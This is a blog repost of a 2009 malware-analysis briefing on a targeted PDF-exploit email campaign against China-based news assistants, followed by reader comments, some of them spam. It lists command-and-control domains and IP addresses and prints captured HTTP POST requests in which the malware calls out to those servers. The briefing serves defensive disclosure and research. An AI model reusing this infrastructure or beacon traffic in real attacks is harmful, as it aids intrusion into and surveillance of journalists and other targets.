I just received the below analysis on the infected email attack on China-based foreign correspondents, via an email (whose sender I do not know).

Their credibility: I do not know the person who sent it, their organization or their expertise, level of credibility, etc. One of the organizations cited, Malware Lab, appears to have been founded this weekend. They do include their email addresses if anyone wants to follow up with them.

Their findings: The attack used a weakness in the Adobe PDF format to send computers back to a compromised computers at Taiwan universities. There is no conclusive evidence to show that the attack was orchestrated by the Chinese government, but one of the few groups that would have ready access to the personal email addresses of news assistants in China is the government. (While the names of news assistants would almost never appear in print, their names must be registered with the government.)

Targeted Malware Attack on Foreign Correspondent’s based in China

By Nart Villeneuve (nart dot villeneuve at utoronto.ca) and Greg Walton
(g.walton at secdev dot ca) | Sept. 26, 2009.

Overview

There have been recent reports of malware attacks on journalists based in China. The attacks specifically targeted Chinese employees working for media organizations, including Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa.1 These employees received an email from “Pam ” who claimed to be an editor with the Straits Times, that came with a PDF attachment that contains malware. When opened, malicious code in the PDF exploits the Adobe Reader program and drops the malware on the target’s computer.

These attacks correlate with reports of increased security measures within China as a result of the 60th anniversary of the founding of the People’s Republic of China.2 These increased security measures have also been extended to the Internet, with providers of anti-censorship technology reporting increased levels of blocking that prevents people from accessing the web sites of foreign media and news organizations.3

This short briefing from the Malware Lab and the Information Warfare Monitor analyzes a sample from one of the attacks on behalf of an international news agency that operates in China, and a member of the Foreign Correspondents Club in Beijing.4

Key Findings:

* The content of the email, and the accompanying malicious attachment, are in well written English and contain accurate information. The email details a reporter’s proposed trip to China to write a story on China’s place in the global economy; all the contacts in the malicious attachment are real people that are knowledgeable about or have a professional interest in China’s economy.

* The domain names used as “command & control” servers for the malware have been used in previous targeted attacks dating back to 2007. The malware domain names, as in previously documented cases, only resolve to real IP addresses for short periods of time.

* The malware exploits vulnerabilities in the Adobe PDF Reader, and its behaviour matches that of malware used in previous attacks dating back to 2008. This malware was found on computers at the Offices of Tibet in London, and has used political themes in malware attachments in the past.

* The IP addresses currently used by the malware are assigned to Taiwan. One of the servers is located at the National Central University of Taiwan, and is a server to which students and faculty connect to download anti-virus software. The second is an IP address assigned to the Taiwan Academic Network. These compromised servers present a severe security problem as the attackers may have substituted their malware for anti-virus software used by students,
employees, and faculty at the National Central University.

Analysis

The email sent to the foreign correspondents from “Pam ” appears to be customized and targeted. The context of the letter and the attached PDF, “Interview list.pdf” is specific to journalists. The email itself is focused on setting up meetings for journalists in China, and the attached PDF contains a list of genuine contacts in China that relate to the context of the email. The name of the hotel and its address are accurate. Moreover, the purpose for the trip to China, to research the “annual economic survey,” correlates with the World Economic Forum’s release of its “Global Competitiveness Report” on September 8, 2009 and the conference that followed in Dalian, China on September 10-12, 2009.5

The PDF contains malicious code that exploits Adobe Acrobat and drops malware on the target’s computer. Only 3 of 41 anti-virus products used by Virus Total detected the malicious code embedded in the PDF.6

When opened, the PDF displays a list of contacts. The contacts listed in the PDF appear to be genuine. All the names and titles in the document are accurate. However, some appear to be former positions held by the individuals, indicating that the document is somewhat dated. It is possible that this document is a legitimate document stolen from a compromised machine, modified to include malware, and used as a lure to entice people to open the malicious attachment.

After opening the attachment, malware is silently dropped on the target’s computer.

The malware attempts DNS resolution for three domains: mail.amberice.com, menberservice.3322.org, and zwy2007.pc-officer.com. Often the domain names will not resolve to proper IP addresses; other times they will resolve only for a short period of time. In this case, two of the domain names eventually resolved:

menberservice.3322.org | 140.115.182.230

zwy2007.pc-officer.com | 210.240.85.250

The domain name zwy2007.pc-officer.com resolves to 210.240.85.250 which is an IP address assigned to the Taiwan Academic Network, Ministry of Education Computer Center. The malware was unable to make successful connections to this IP address.

However, the domain name “pc-officer.com” is a well known malware domain name that has been used in previous attacks. In 2007, Maarten Van Horenbeeck investigated cases of targeted attacks that used a “petition to the International Olympic Committee on Chinese human rights violations” as the theme.7 In those cases, the malware attempted to connect to:

ihe1979.3322.org

ding.pc-officer.com | 61.219.152.125

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

A similar case was investigated by F-Secure earlier this year.8 In that case, the domain names that the malware attempted to connect to were:

ihe1979.3322.org

feng.pc-officer.com | 216.255.196.154

feng.pc-officer.com | 211.234.122.84

The same DNS techniques were used – the domain names only resolved to real IP addresses for a short period of time.

The domain menberservice.3322.org eventually resolved to 140.115.182.230, which reverse resolves to avirus.is.ncu.edu.tw. This location (https://avirus.is.ncu.edu.tw:4343/officescan/console/html/ClientInstall/) is at the National Central University of Taiwan, and it is used bystudents and faculty to download anti-virus software.9 This is potentially a severe security problem, as the attackers may have substituted their malware for anti-virus software for use by students, employees, and faculty at the National Central University.

menberservice.3322.org | 140.115.182.230 | avirus.is.ncu.edu.tw

The malware connects to this location and begins sending and receiving information:

POST http://menberservice.3322.org:8000/LFDXFiRcVs3902.rar HTTP/1.1

User-Agent: Mozil
la/4.2.20 (compatible; MSIE 5.0.2; Win32)

Host: menberservice.3322.org

Content-Length: 682

Proxy-Connection: keep-alive

Pragma: no-cache

.new_host_42

HTTP/1.1 200 OK

Date: Tue Sep 22 21:41:10 2009

Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)

Content-Length: 32

Content-Type: application/octet-stream

Proxy-Connection: keep-alive

The malware matches behaviour documented by ThreatExpert earlier this year.10 Documents with names such as “Urgent Appeal to Secretary Hillary Clinton.doc” and “Days with ITSN Tibet in My Eyes.doc” contained malware that connected to mmwbzhij.meibu.com on ports 8585 and 8686.

http://mmwbzhij.meibu.com:8686/[random characters].[random file
extension]

where [random characters] string may look similar to:

* qRXycRXuwJ11749

* PqJNBkcPDm18630

* ZPDPyZkZcV23661

and [random file extension] can be any of the following: rm, mov, mp3, pdf.

This matches behaviour that the Information Warfare Monitor documented in the “Tracking GhostNet” report11 after analyzing a compromised computer at the Offices of Tibet in London, U.K. In that case, there were connections to oyd.3322.org which resolved to 58.141.132.66 on port 4501:

POST http://oyd.3322.org:4501/TkBXPPXkRL14509.pdf HTTP/1.1

User-Agent: Mozilla/4.8.20 (compawhichplatform.htmtible; MSIE
5.0.2; Win32)

Host: oyd.3322.org

Content-Length: 46

Proxy-Connection: keep-alive

Pragma: no-cache

new_host_24

HTTP/1.1 200 OK

Date: Wed Oct 01 23:05:15 2008

Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)

Content-Length: 44

Content-Type: application/octet-stream

Proxy-Connection: keep-alive

A follow-up visit to OOT-London found another malware infection connecting to mmwbzhij.meibu.com which resolved to 216.131.67.95 on port 8686:

POST http://mmwbzhij.meibu.com:8686/yDFDcVoFma29957.mp3 HTTP/1.1

User-Agent: Mozilla/4.8.20 (compatible; MSIE 5.0.2; Win32)

Host: mmwbzhij.meibu.com

Content-Length: 32

Proxy-Connection: keep-alive

Pragma: no-cache

.new_host_23

HTTP/1.1 200 OK

Date: Fri Apr 10 22:49:22 2009

Server: Apache/1.3.20 (Unix) (Red-Hat/Linux)

Content-Length: 32

Content-Type: application/octet-stream

Proxy-Connection: keep-alive

The domain names 3322.org and meibu.com are dynamic DNS services that allow the attackers to map domain names to IP addresses they control. In these cases, the attackers are not required to register domain names. Attackers typically favour dynamic DNS services such as these.12 The attackers have pointed these domains to IP’s on the networks of Black Oak Computers Inc, CA, USA, and C&M Communication Co., Ltd., Korea, in addition to the Taiwan Academic Network.

The control servers on pc-officer.com have, in the past, resolved to IP addresses on One Eighty Networks, WA, USA, KIDC, Korea and HINET, Taiwan, in addition to the National Central University of Taiwan’s server where students and faculty download anti-virus software.

Attribution Issues

In general, determining attribution in these types of attacks is difficult. Analyzing domain registration and other contextual information can occasionally provide some useful leads.

The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “[email protected]” and the phone number “86-010-4564654.” There are some links between these data and the registration data in other domain names. For example, “wei zheng” also registered “fclinux.com” with the email address “[email protected]” and the phone number “86 10 13810358162.” This “wei zheng” also registered “winxpupdata.com” with the phone number “86 10 13810358162” with the email address “[email protected]” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “[email protected]” However the technical contact is “lin hai” with the email address “[email protected]

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic if China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.


Greg Walton is the Editor of The Infowar Monitor. The Information Warfare Monitor is a joint project of the Advanced Network Research Group, part of the Cambridge Security Programme, The SecDev Group and the Citizen Lab, an interdisciplinary laboratory based at the Munk Centre for International Studies, University of Toronto.

http://www.infowar-monitor.net/

Sign Up

Enter your email address below to subscribe to the mailing list and register for Social On Us, the [email protected] webinar series.


Newsletter updates
Webinars invites

Leave a Reply

13 comments

  1. Lina

    They are very credible — Nart Villeneuve and Greg Walton are both with Citizen Lab at the University of Toronto; InfoWar Monitor is a joint project between Citizen Lab and SecDev, a Canadian think tank; MalWare Lab, IIRC, also includes a number of the Citizen Lab members.

    Nart Villeneuve (http://www.nartv.org) specifically worked on the *excellent* InfoWar Monitor-ONI Asia report on TOM-Skype's monitoring of chats, Breaching Trust, and the InfoWar Monitor report on PRC cyber espionage, Tracking GhostNet.

    Greg Walton wrote the excellent Golden Shield report for the International Centre for Human Rights and Democratic Development (http://www.dd-rd.ca/site/publications/index.php…).

    Both are frequent commentators on Chinese censorship online and “hacktivism”.

  2. rickv

    Lame, but several security podcasts covered PDF exploits last year, and again in March when a new exploit surfaced. News org IT admins should be on top of this, and correspondents *must* listen (and should be receiving in-house emails about such). The updates were out there (just horribly late; thanks, Adobe). But since these things are common in PDFs and other docs, it may be useful to view these within Sandboxie. (note, I am *not* a pen tester of any sort)

  3. Pingback: Analysis of cyber attacks on foreign journalists in China « Journalism, Journalists and the World

  4. Pingback: Amid tensions over Chinese censorship, US unveils strategy for cyberspace | Penn Olson

  5. National Central University of Taiwan, and it is used bystudents and faculty to download anti-virus software.9

  6. yes,Excessive weight has constantly been a setback for myself. I tasted the correct tablet and I lost much fat. Afterward I determined to refrain from having it because I already got the natural body. I propose you  possibly this is the best thing you need for a normal shape.

  7. Pingback: babyliss hot hair brush

  8. Pingback: film terbaru jason statham